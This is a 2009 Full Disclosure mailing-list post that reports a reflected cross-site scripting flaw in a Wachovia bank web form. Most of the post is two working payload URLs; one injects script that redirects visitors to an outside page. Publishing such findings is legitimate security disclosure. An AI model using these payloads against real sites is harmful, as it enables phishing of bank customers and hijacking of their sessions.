
Full Disclosure mailing list archives
Wachovia Banking Wizard - XSS - PoC
From: Marshall Whittaker <marshallwhittaker () gmail com>
Date: Sun, 30 Aug 2009 08:33:09 -0500
This is only a proof of concept, please use this responsibly. This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 30 2009. Very simple standard cross site scripting exploit. As you can see, it works with HEX as well. Bad characters obviously arn't filtered correctly. https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=
<script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script %0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html ";%3B</script> --oxagast
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Wachovia Banking Wizard - XSS - PoC Marshall Whittaker (Aug 30)